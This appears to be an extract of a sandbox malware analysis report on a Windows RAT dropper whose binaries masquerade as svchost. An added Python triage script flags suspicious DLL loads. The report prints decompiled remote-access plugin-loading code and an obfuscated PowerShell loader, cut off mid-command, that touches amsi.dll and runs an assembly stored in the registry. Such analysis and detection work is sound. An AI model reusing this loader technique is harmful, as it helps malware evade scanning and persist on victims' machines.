                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: mscoree.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: mscoree.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: pdh.dll
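The module-load list above is more useful once it is read per process rather than per line: the binaries dropped to C:\Users\Public pull in avicap32.dll and msvfw32.dll (Video for Windows capture), winmm.dll, taskschd.dll (the Task Scheduler COM API, the same pair of taskschd.dll and xmllite.dll that schtasks.exe itself loads), WMI and networking libraries, while the Windows processes in the same list (svchost.exe, WMIADAP.exe, dllhost.exe, lsass.exe) load pdh.dll and amsi.dll in the ordinary course of running. The script below is an added example, not part of the Joe Sandbox report: it parses "Section loaded" lines in the flattened form shown here, maps a short list of DLLs to the capability they imply, and only reports processes outside C:\Windows, plus any user-writable-path binary whose name is built on a system image name (C:\Users\Public\Deadsvchost.exe next to the real C:\Windows\System32\svchost.exe). The sample lines are a constructed subset copied from the listing; the capability wording and the set of imitated image names are my choices.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the "Section loaded" events from the listing
# above, kept in the flattened form the report extraction produced (no space
# before "Section loaded:", and a trailing "Jump to behavior" link on some).
SAMPLE_EVENTS = r"""
Source: C:\Users\Public\DeadXClient.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\Public\DeadXClient.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\Public\DeadXClient.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\Public\DeadXClient.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\DeadCodeRootKit.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\Public\DeadROOTkit.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dll
"""

# Lazy "proc" match stops at the first "Section loaded:", so the missing space
# in "DeadXClient.exeSection loaded:" does not matter; the DLL match stops at
# ".dll", so a trailing "Jump to behavior" is ignored as well.
EVENT_RE = re.compile(
    r"Source:\s*(?P<proc>.+?)\s*Section loaded:\s*(?P<dll>[\w.\-]+?\.dll)", re.I)

# What each library is. Whether a given process has a legitimate reason to load
# it is the analyst's call, which is why system-path processes are filtered out.
CAPABILITY_HINTS = {
    "avicap32.dll": "webcam capture (Video for Windows)",
    "msvfw32.dll": "webcam capture (Video for Windows)",
    "winmm.dll": "audio / multimedia",
    "taskschd.dll": "Task Scheduler COM API (scheduled-task persistence)",
    "amsi.dll": "AMSI engaged (in-memory assembly or script content scanned)",
    "wbemcomn.dll": "WMI client",
    "scrrun.dll": "Windows Script runtime (FileSystemObject)",
    "dnsapi.dll": "network (DNS resolution)",
    "mswsock.dll": "network (Winsock)",
    "winhttp.dll": "network (WinHTTP)",
    "fwpuclnt.dll": "network (filtering platform client)",
    "cryptsp.dll": "CryptoAPI provider",
    "rsaenh.dll": "CryptoAPI provider",
}

SYSTEM_ROOT = "c:\\windows\\"
# Image names from the report's own process list; chosen here, not a Windows constant.
SYSTEM_IMAGE_NAMES = {"svchost", "dllhost", "lsass", "winlogon", "dwm"}


def parse_events(text):
    """Return [(process_path, dll_name)] for every matching line; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.search(line)
        if m:
            events.append((m.group("proc").strip(), m.group("dll").lower()))
    return events


def is_system_path(path):
    return path.lower().startswith(SYSTEM_ROOT)


def imitates_system_binary(path):
    r"""True for a non-system path whose basename is built on a core Windows image name
    (C:\Users\Public\Deadsvchost.exe against C:\Windows\System32\svchost.exe)."""
    if is_system_path(path):
        return False
    base = path.rsplit("\\", 1)[-1].lower()
    return any(name in base for name in SYSTEM_IMAGE_NAMES)


def triage(text):
    """Per process: location class, masquerade flag, capability hints, and the raw DLL set."""
    loads = defaultdict(set)
    for proc, dll in parse_events(text):
        loads[proc].add(dll)
    result = {}
    for proc, dlls in loads.items():
        result[proc] = {
            "system_path": is_system_path(proc),
            "masquerade": imitates_system_binary(proc),
            "capabilities": sorted({CAPABILITY_HINTS[d] for d in dlls if d in CAPABILITY_HINTS}),
            "dlls": sorted(dlls),
        }
    return result


def findings(text):
    r"""Processes outside C:\Windows that load a flagged capability or imitate a system image.
    Windows' own processes are left out on purpose: svchost.exe or WMIADAP.exe loading
    pdh.dll or amsi.dll is routine and a rule keyed on the DLL name alone would fire on them."""
    out = []
    for proc, info in triage(text).items():
        if info["system_path"]:
            continue
        if info["capabilities"] or info["masquerade"]:
            out.append((proc, info))
    return sorted(out, key=lambda item: item[0])


if __name__ == "__main__":
    for proc, info in findings(SAMPLE_EVENTS):
        tags = list(info["capabilities"])
        if info["masquerade"]:
            tags.append("name imitates a Windows system image")
        print(proc, "->", "; ".join(tags))
```

Run it against the full listing by feeding the report text to `findings()`; the same parser accepts the cleaned form with a space before "Section loaded:", so it works on either rendering of the report.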
                         Source: C:\Users\user\Desktop\aoKTzGQSRP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                         Source: Deadsvchost.lnk.6.dr LNK file: ..\..\..\..\..\..\..\..\Public\Deadsvchost.exe
                         Source: C:\Windows\System32\wbem\WMIADAP.exe File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
                         Source: C:\Users\user\AppData\Local\Temp\1.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                         Source: aoKTzGQSRP.exe Static file information: File size 10214400 > 1048576
                         Source: aoKTzGQSRP.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x9ac400
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: CMaker 2.0.exe, 00000005.00000002.2263462576.00007FFD93590000.00000040.00000001.01000000.00000017.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                         Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: CMaker 2.0.exe, 00000005.00000002.2261490839.00007FFD8F632000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2261490839.00007FFD8F632000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: CMaker 2.0.exe, 00000002.00000003.2153120830.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2269341055.00007FFDA4341000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: CMaker 2.0.exe, 00000002.00000003.2153120830.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2269341055.00007FFDA4341000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: CMaker 2.0.exe, 00000005.00000002.2262592946.00007FFD8FB3B000.00000040.00000001.01000000.00000009.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: CMaker 2.0.exe, 00000005.00000002.2270072340.00007FFDA5491000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: CMaker 2.0.exe, 00000005.00000002.2267528583.00007FFDA32F1000.00000040.00000001.01000000.0000000C.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: CMaker 2.0.exe, 00000005.00000002.2268863981.00007FFDA3AE1000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: CMaker 2.0.exe, 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: CMaker 2.0.exe, 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: CMaker 2.0.exe, 00000005.00000002.2269787988.00007FFDA4DA1000.00000040.00000001.01000000.00000014.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: CMaker 2.0.exe, 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: CMaker 2.0.exe, 00000005.00000002.2268396288.00007FFDA3A81000.00000040.00000001.01000000.00000018.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: CMaker 2.0.exe, 00000005.00000002.2269100050.00007FFDA4161000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2253563049.0000022D32BE0000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp

                        Data Obfuscation

                        Source: DeadXClient.exe.4.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: DeadXClient.exe.4.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: DeadROOTkit.exe.4.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: DeadROOTkit.exe.4.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: DeadROOTkit.exe.4.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Deadsvchost.exe.6.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Deadsvchost.exe.6.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: DeadXClient.exe.4.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
                        Source: DeadXClient.exe.4.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
                        Source: DeadXClient.exe.4.dr, Messages.cs .Net Code: Memory
                        Source: DeadROOTkit.exe.4.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
                        Source: DeadROOTkit.exe.4.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
                        Source: DeadROOTkit.exe.4.dr, Messages.cs .Net Code: Memory
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, Messages.cs .Net Code: Memory
                        Source: Deadsvchost.exe.6.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
                        Source: Deadsvchost.exe.6.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
                        Source: Deadsvchost.exe.6.dr, Messages.cs .Net Code: Memory
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($yudsyoexNPPoGc,$BQVbDmmpYciFvEPZCVf).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$xjZyvNWKEgRcmEMjl=$mfOCIRUxBUWIVl.Invoke($Null
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('Dead'+'s'+''+[Char](116)+''+[Char](97)+'ger')).EntryPoint.I
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[
